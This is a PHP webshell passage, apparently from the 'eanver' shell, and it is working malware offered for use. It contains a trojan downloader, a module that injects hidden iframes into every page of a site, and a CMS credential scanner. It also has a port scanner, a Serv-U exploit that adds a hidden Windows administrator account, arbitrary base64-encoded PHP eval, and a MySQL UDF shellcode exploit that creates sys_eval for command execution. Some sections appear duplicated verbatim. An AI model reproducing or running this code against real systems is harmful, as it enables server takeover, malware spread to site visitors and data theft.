print<<<END
<br><br> <input type="text" name="uppath" value="{$uppath}" style="width:500px">
<br><br> <input type="file" name="upfile" style="width:500px;height:22px;">
</div><div class="actall"><input type="submit" value="" style="width:80px;">
END;
}
elseif($o == 'd')
{
print<<<END
<br><br><br> <input type="text" name="downfile" value="{$downfile}" style="width:500px">
</div><div class="actall"><input type="submit" value="" style="width:80px;">
END;
}
else
{
if(!empty($_POST['msql']))
{
$msql = $_POST['msql'];
$msql = base64_decode($msql);
if($result = @mysql_query($msql,$conn))
{
$MSG_BOX = 'SQL<br>';
$k = 0;
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
}
else $MSG_BOX .= mysql_error();
}
print<<<END
<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
<div class="actall">
<select onchange="return nFull(options[selectedIndex].value)">
<option value="0" selected></option>
<option value="1"></option>
<option value="2"></option>
<option value="3"></option>
</select>
<input type="button" value="" onclick="SubmitUrl();" style="width:80px;">
END;
}
if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
else echo '</div></center></form>';
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print<<<END
<form method="POST">
<div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="" type="submit" style="width:80px;"></div></form>
END;
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
{
echo '<div class="actall">';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : '';
echo '</div>';
}
break;
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell',''));
}
}
else{
die(html_a('?eanver=sqlshell',''));
}
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('<tr><td>:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo ' ';
}
html_n('</td></tr>');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'");
html_input("submit","doquery","");
html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
html_n('--->');
html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
html_n('</form><br>');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "SQL";
}else{
echo ": ".mysql_error();
}
}
if($_GET['table']){
html_n('<table border=1><tr>');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
}
html_n('</tr><tr>');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('<td>'.$text[$row].'</td>');
}
echo '</tr>';
}
}
else{
$query = "SHOW TABLES FROM" . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
}
}
}
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print<<<END
<form method="POST">
<div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="" type="submit" style="width:80px;"></div></form>
END;
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
{
echo '<div class="actall">';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : '';
echo '</div>';
}
break;
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell',''));
}
}
else{
die(html_a('?eanver=sqlshell',''));
}
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('<tr><td>:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo ' ';
}
html_n('</td></tr>');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'");
html_input("submit","doquery","");
html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
html_n('--->');
html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
html_n('</form><br>');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "SQL";
}else{
echo ": ".mysql_error();
}
}
if($_GET['table']){
html_n('<table border=1><tr>');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
}
html_n('</tr><tr>');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('<td>'.$text[$row].'</td>');
}
echo '</tr>';
}
}
else{
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
}
}
}
break;
case "upfiles":
html_n('<tr><td>: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
html_input("text","uppath",root_dir,"<br>: ","51");
print<<<END
<SCRIPT language="JavaScript">
function addTank(){
var k=0;
k=k+1;
k=tank.rows.length;
newRow=document.all.tank.insertRow(-1)
<!---->
newcell=newRow.insertCell()
newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
}
function delTank() {
if(tank.rows.length==1) return;
var checkit = false;
for (var i=0;i<document.all.tankNo.length;i++) {
if (document.all.tankNo[i].checked) {
checkit=true;
tank.deleteRow(i+1);
i--;
}
}
if (checkit) {
} else{
alert("");
return false;
}
}
</SCRIPT>
<br><br>
<table cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr>
<td width="7%"><input class="button01" type="button" onclick="addTank()" value=" " name="button2"/>
<input name="button3" type="button" class="button01" onClick="delTank()" value="" />
</td>
</tr>
</table>
<table id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
<tr><td></td></tr>
<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
</table>
END;
html_n('<br><input type="submit" name="upfiles" value="" style="width:80px;"> <input type="button" value="" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
if($_POST['upfiles']){
foreach ($_FILES["upfile"]["error"] as $key => $error){
if ($error == UPLOAD_ERR_OK){
$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
$name = $_FILES["upfile"]["name"][$key];
$uploadfile = str_path($_POST['uppath'].'/'.$name);
$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
echo '<br><br>'.$upload;
}
}
}
html_n('</form>');
break;
case "guama":
$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
html_n('<tr><td>"|",.<form method="POST"><br>');
html_input("text","path",$patht,"","45");
html_input("checkbox","pass","","","",true);
html_input("text","type",$typet,"<br><br>","60");
html_text("code","67","5",$codet);
html_n('<br><br>');
html_radio("","","guama","qingma");
html_input("submit","passreturn","");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
}
break;
case "tihuan":
html_n('<tr><td>,.<br><br><form method="POST">');
html_input("text","path",root_dir,"","45");
html_input("checkbox","pass","","","",true);
html_text("newcode","67","5",$_POST['newcode']);
html_n('<br><br>');
html_text("oldcode","67","5",$_POST['oldcode']);
html_input("submit","passreturn","","<br><br>");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
}
break;
case "scanfile":
css_js("4");
html_n('<tr><td>MYSQL,.<br>,,.<form method="POST" name="sform"><br>');
html_input("text","path",root_dir,"","45");
html_input("checkbox","pass","","","",true);
html_input("text","code",$_POST['code'],"<br><br>","40");
html_select(array("--MYSQL--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
html_n('<br><br>');
html_radio("","","scanfile","scancode");
html_input("submit","passreturn","");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
}
break;
case "scanphp":
html_n('<tr><td>,.<form method="POST"><br>');
html_input("text","path",root_dir,"","40");
html_input("checkbox","pass","","<br><br>","",true);
html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
html_input("submit","passreturn","","<br><br>");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
}
break;
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873';
print<<<END
<form method="POST">
<div class="actall">IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
<div class="actall"> <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
<div class="actall"><input type="submit" value="" style="width:80px;"></div>
</form>
END;
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
{
echo '<div class="actall">';
$ports = explode('|', $_POST['port']);
for($i = 0;$i < count($ports);$i++)
{
$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
echo $fp ? '<font color="#FF0000"> ---> '.$ports[$i].'</font><br>' : ' ---> '.$ports[$i].'<br>';
ob_flush();
flush();
}
echo '</div>';
}
break;
case "getcode":
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b> URL </b></p></center></body>";exit;}
print<<<END
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form method="POST" target="proxyframe">
<tr class="firstalt">
<td align="center"><b></b></td>
</tr>
<tr class="secondalt">
<td align="center" ><br><ul><li> HTTP ,CSS.</li><li>URL, SQL Injection .</li><li> URL,IP : {$_SERVER['SERVER_NAME']}</li></ul></td>
</tr>
<tr class="firstalt">
<td align="center" height=40 >URL: <input name="url" value="about:blank" type="text" class="input" size="100" >
<input name="" value="" type="submit" class="input" size="30" >
</td>
</tr>
<tr class="secondalt">
<td align="center" ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
</tr>
</form></table>
END;
break;
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print<<<END
<div class="actall"><a href="?eanver=servu">[]</a> <a href="?eanver=servu&o=adduser">[]</a></div>
<form method="POST">
<div class="actall">ServU <input name="SUPort" type="text" value="43958" style="width:300px"></div>
<div class="actall">ServU <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
<div class="actall">ServU <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
if($_GET['o'] == 'adduser')
{
print<<<END
<div class="actall"> <input name="user" type="text" value="envl" style="width:200px">
<input name="password" type="text" value="envl" style="width:200px">
<input name="part" type="text" value="C:\\\\" style="width:200px"></div>
END;
}
else
{
print<<<END
<div class="actall"> <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>
<input name="user" type="hidden" value="envl">
<input name="password" type="hidden" value="envl">
<input name="part" type="hidden" value="C:\\\\"></div>
END;
}
echo '<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
{
echo '<div class="actall">';
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = $domain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ":$sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = $adduser;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
if(!empty($_POST['SUCommand']))
{
$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = "USER ".$_POST['user']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = "PASS ".$_POST['password']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo ": site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = $deldomain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
@fclose($exp);
}
@fclose($sock);
echo '</div>';
}
break;
case "phpcode":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode));
echo '<script language="javascript">';
html_base();
echo 'function SubmitUrl(){
document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value);
document.getElementById(\'sendcode\').submit();
}</script><tr><td><form method="POST" id="sendcode" ><? ?>,BASE64<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">'.$phpcode.'</textarea><br><br><input type="button" value="" onclick="SubmitUrl();" style="width:80px;">';
if(!empty($_POST['phpcode'])){
echo "<br><br>";
eval(stripslashes(base64_decode($_POST['phpcode'])));
}
html_n('</form>');
break;
case "myexp":
$MSG_BOX = 'DLL,.MYSQLroot,DLL.';
$info = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
@$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
if($conn)
{
@mysql_select_db($mdata);
/*************************************/
$str=mysql_get_server_info();
//echo 'MYSQL:'.$str." ";
if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql,$conn);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]);
$path=$pa.$BH;
}else{
$path='C:/WINDOWS/'.$BH;
}
//$mpath=$path;
if(!empty($mpath))
{
$mpath=$mpath;
}else{
$mpath=$path;
}
/*************************************/
if((!empty($_POST['outdll'])) && (!empty($mpath)))
{
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if(@mysql_query($query,$conn))
{
$shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
if(@mysql_query($query,$conn))
{
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
if(@mysql_query($query,$conn))
{
$ap = explode('/', $mpath); $inpath = array_pop($ap);
$query = 'Create Function sys_eval returns string soname \''.$inpath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? 'DLL' : 'DLL'.mysql_error();
}
else $MSG_BOX = 'DLL'.mysql_error();
}
else $MSG_BOX = '';
@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
}
else $MSG_BOX = '';
}
if(!empty($_POST['runcmd']))
{
$query = 'select sys_eval("'.$sqlcmd.'");';
$result = @mysql_query($query,$conn);
if($result)
{
$k = 0; $info = NULL;
while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
$info = $infotmp;
$MSG_BOX = '';
}
else $MSG_BOX = '';
}
}
else $MSG_BOX = 'MYSQL';
}
print<<<END
<form id="mform" method="POST">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<center><div class="actall">
<input type="text" name="mhost" value="{$mhost}" style="width:110px">
<input type="text" name="mport" value="{$mport}" style="width:110px">
<input type="text" name="muser" value="{$muser}" style="width:110px">
<input type="text" name="mpass" value="{$mpass}" style="width:110px">
<input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div><div class="actall">
() <input type="text" id='dlllj' name="mpath" value="{$mpath}" style="width:500px">
64MYSQL <input type="checkbox" onclick="document.getElementById('dlllj').value='';" name="mysql64" value="1" {$mysql64} />
<input type="submit" name="outdll" value="DLL" style="width:80px;"></div>
<div class="actall">MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;">
<input type="submit" name="runcmd" value="" style="width:80px;">
<br />
<pre>
<textarea style="width:720px;height:300px;">{$info}</textarea>
</pre>
</div></center>
</form>
END;
break;
case "mysql_exec":
if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
{
if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
{
$cookietime = time() + 24 * 3600;
setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
setcookie('m_eanverport',$_POST['mport'],$cookietime);
setcookie('m_eanveruser',$_POST['muser'],$cookietime);
setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
die(',...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
}
}
print<<<END
<form method="POST" name="oform" id="oform">
<div class="actall"> <input type="text" name="mhost" value="localhost" style="width:300px"></div>
<div class="actall"> <input type="text" name="mport" value="3306" style="width:300px"></div>
<div class="actall"> <input type="text" name="muser" value="root" style="width:300px"></div>
<div class="actall"> <input type="text" name="mpass" value="" style="width:300px"></div>
<div class="actall"><input type="submit" value="" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
</form>
END;
break;
case "mysql_msg":
$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
if($conn)
{
print<<<END
<script language="javascript">
function Delok(msg,gourl)
{
smsg = "[" + unescape(msg) + "]?";
if(confirm(smsg)){window.location = gourl;}
window.location = gourl;
}
function Createok(ac)
{
if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
return false;
}
END;
html_base();
print<<<END
function SubmitUrl(){
document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
document.getElementById('gform').submit();
}
</script>
END;
$BOOL = false;
$MSG_BOX = ':'.$_COOKIE['m_eanveruser'].' :'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' :';
$k = 0;
$result = @mysql_query('select version();',$conn);
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
echo '<div class="actall"> :';
$result = mysql_query("SHOW DATABASES",$conn);
while($db = mysql_fetch_array($result)){echo ' [<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
echo '</div>';
if(isset($_GET['db']))
{
mysql_select_db($_GET['db'],$conn);
$_POST['nsql']=base64_decode($_POST['nsql']);
if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '' : ' '.mysql_error();}
if(is_array($_POST['insql']))
{
$query = 'INSERT INTO '.$_GET['table'].' (';
foreach($_POST['insql'] as $var => $key)
{
$querya .= $var.',';
$queryb .= '\''.addslashes($key).'\',';
}
$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();
}
if(is_array($_POST['upsql']))
{
$query = 'UPDATE '.$_GET['table'].' SET ';
foreach($_POST['upsql'] as $var => $key)
{
$queryb .= $var.'=\''.addslashes($key).'\',';
}
$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();
}
if(isset($_GET['del']))
{
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
$where = $query.substr($queryc, 0, -4).';';
$MSG_BOX = mysql_query($where,$conn) ? '' : ' '.mysql_error();
}
$action = '?eanver=mysql_msg&db='.$_GET['db'];
if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();}
if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
echo '<div class="actall"><form method="POST" action="'.$action.'" name="gform" id="gform">';
echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
echo '<input type="button" name="querysql" value="" onclick="SubmitUrl();" style="width:60px;height:49px;">';
echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
if(isset($_GET['table']))
{
echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'"></a>]</div>';
if(isset($_GET['edit']))
{
if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$u = 0;
foreach($good as $var => $key)
{
$queryc .= $var.'=\''.$key.'\' AND ';
$type = @mysql_field_type($result, $u);
$len = @mysql_field_len($result, $u);
echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
$u++;
}
$where = 'WHERE '.substr($queryc, 0, -4);
echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
}
else
{
$query = 'SHOW COLUMNS FROM '.$_GET['table'];
$result = mysql_query($query,$conn);
$fields = array();
$pagesize=20;
$row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
$numrows=$row_num;
$pages=intval($numrows/$pagesize);
if ($numrows%$pagesize) $pages++;
$offset=$pagesize*($page - 1);
$page=$_GET['p'];
if(!$page) $page=1;
if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
echo '<table border="0"><tr>';
echo '<td class="toptd" style="width:70px;" nowrap></td>';
